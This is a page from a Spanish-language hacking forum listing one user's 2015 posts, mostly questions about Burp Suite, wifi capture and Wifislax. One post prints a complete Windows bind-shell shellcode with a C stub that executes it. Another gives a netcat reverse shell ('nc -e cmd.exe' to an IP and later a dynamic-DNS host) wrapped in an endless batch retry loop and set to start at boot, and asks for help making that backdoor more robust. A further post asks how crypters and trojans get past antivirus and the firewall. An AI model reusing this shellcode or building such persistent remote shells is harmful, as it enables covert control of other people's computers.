elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Temas
Páginas: 1 2 3 4 [5]
41  Seguridad Informática / Nivel Web / Burpsuite: no puedo usar Proxy Listener en puerto 80 en: 8 Diciembre 2015, 03:04 am
Hola que tal camaradas! Estaba configurando el BurpSuite para usarlo junto con técnicas MITM y poder interceptar y modificar los paquetes que recibo... Resulta que en la sección de Opciones Proxy Listeners agrego mi ip local y el puerto 443, la hago invisible y la marco como running... Ningun problema, pero cuando quiero agregar mi ip local junto con el puerto 80, el programa no me deja marcar éste proxy como running. La casilla queda en blanco y es imposible marcarla. Ya probe con otros puertos, y el 80 es el único problematico... Alguna idea? Gracias desde ya!

Saludos
42  Programación / Programación C/C++ / No comprendo la sección del main() que se necesita para ejecutar Opcodes en hexa en: 19 Octubre 2015, 06:52 am
Hola gente! No puedo entender la sintaxis de las lineas del main(), éstas lineas son necesarias para ejecutar el shellcode  (éste sirve para hacer bind a un puerto en Windows). No entiendo el uso de los paréntesis ni los punteros, ni los casts (escritos con esa sintaxis), si me ayudaran a entender se los agradecería! Saludos


Código
  1. char shellcode[] =      "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
  2.                           "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
  3.                           "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
  4.                           "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
  5.                           "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
  6.                           "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
  7.                           "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
  8.                           "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
  9.                           "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
  10.                           "\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f"
  11.                           "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5"
  12.                           "\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
  13.                           "\x00\x53\xff\xd5\x63\x6d\x64\x2e\x65\x78\x65\x00";
  14.  
  15.  
  16.  
  17.  
  18.  
  19. int main(int argc, char **argv)
  20. {
  21.    int (*func)();
  22.    func = (int (*)()) shellcode;
  23.    (int)(*func)();
  24.     return 0;
  25. }
  26.  
43  Seguridad Informática / Hacking Wireless / Como mejorar la señal que capto de las distintas redes? en: 3 Septiembre 2015, 15:38 pm
Hola gente que tal! Bueno esa es la pregunta. Como captar mejor las señales de los routers y captar mas cantidad de los mismos
 Gracias desde ya!
44  Seguridad Informática / Hacking Wireless / Se puede seguir capturando en un .cap ya creado? en: 3 Septiembre 2015, 15:26 pm
Hola que tal. Quería saber si hay algún comando En el airodump para seguir capturando en un .cap ya creado (luego de haber cerrado el airodump) para no perder los ivs q habiq capturado anteriormente. Gracias!
45  Foros Generales / Dudas Generales / Wifislax corre mejor en memoria USB o en disco rígido? en: 29 Agosto 2015, 22:10 pm
Hola que tal gente! Bueno básicamente esa es la pregunta. Si me conviene instalarlo en el disco  o correrlo desde memoria USB y por qué.

Mi disco:
Disco n.º 1 - WDC WD10EARS-00Y5B1 (931 GB)

Y mi otra pregunta es si es cierto que el aircrack funciona más rápido en wifislax que en kali linux. Gracias desde ya! :D
46  Foros Generales / Dudas Generales / Problema con NO-IP y Netcat en: 9 Agosto 2015, 02:49 am
Hola gente que tal! Les cuento mi problema! Un par de personas me dieron acceso a sus máquinas para que las supervise, las mantenga limpias, y las administre. Instale el Netcat y lo dejo en "habla" digamos a un puerto mio y mi direccion de IP, ejemplo del comando:

nc -e cmd.exe 192.188.1.231 24444

Tambien dentro del directorio run deje una entrada para que el netcat se inicie al arrancar la computadora... Uno de los problemas (que solucione) es que el comando se ejecutaba una sola vez y si yo no dejaba mi netcat en escucha, ya no habia forma de volver a conectarme, entonces programe un simple algoritmo de polling con batch para que el comando se ejecutara siempre que la pc estuviera prendida. Quedo algo asi:

Set/a var=0
:while
nc -e cmd.exe 192.188.1.231 24444
if %var% == 0 (goto while)
pause

Ahi funcionaba perfecto. Si no estaba en escucha, el programa itera interminablemente hasta que yo estuviera en escucha y si me desconecto continuaba iterando y podía volver a conectarme. El problema es que mi IP pública es dinámica asi que tuve que reemplazar mi ip por el dominio DNS que me dio NO-IP, quedando algo asi:

Set/a var=0
:while
nc -e cmd.exe randon.ddns.net 24444
if %var% == 0 (goto while)
pause

Mi problema actual es el siguiente: Si yo no tengo abierto el cliente DUC, en los remotos se entra una sola vez al comando del netcat y se muere ahi, no continua iterando... Enonces si despues abro el DUC, no tengo forma de acceder... Si tengo abierto el cliente antes de que se ejecute el batch, funciona a la perfección: si no estoy a la escucha con netcat, iteran, y si estoy a la escucha acceden, y cuando me desconecto siguen iterando... Una solución sería dejar mi PC prendida las 24 horas con el cliente DUC abierto, lo cual no me agrada... Lo que quería hacer, es un algoritmo que verifique si me pude conectar, si hay conexion, o que se de cuenta si mi cliente este abierto o no, y en caso de no estarlo que salga del netcat y le seda nuevamente el control al batch para que siga iterando como tendría que ser...

Espero que me ayuden a implementar éste algoritmo, que me den alguna idea... No me hagan usar otra cosa que no sea Netcat, xq estoy encariñado con éste :p jaja. Y se que tiene que existir una solucion para conseguir lo que busco. Espero que me hayan entendido y sepan como ayudarme! Desde ya, muchisimas gracias! :D
47  Seguridad Informática / Análisis y Diseño de Malware / Duda sobre troyanos y firewall de Windows en: 4 Agosto 2015, 10:12 am
Hola gente que tal? Tengo una duda. Se que los troyanos, virus, y demas malware pueden venir codificados con crypters para esquivar a los antivirus pero no entiendo bien el papel que toma el firewall de windows, su funcionamiento... Por ejemplo alguna vez habré descargado malware y me salio una ventana de firewall de windows diciendome que había bloqueado  ciertas características de la aplicación y venía con dos opciones: una para habilitarla en la red publica y otra para solo habilitarla en la privada... Mis dudas concretas serían: si yo (victima) hubiera seleccionado la opcion de habilitarla solo en redes privadas y el hacker a través de un backdoor está tratando de acceder a una consola inversa a traves de internet, entonces no tendría acceso? Y mi otra duda es si un crypter ademas de esquivar a los antivirus, esquivan al firewalll... Por ejemplo un troyano bien cifrado no me haría saltar la ventana que les dije? Gracias desde ya por su tiempo!
Páginas: 1 2 3 4 [5]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines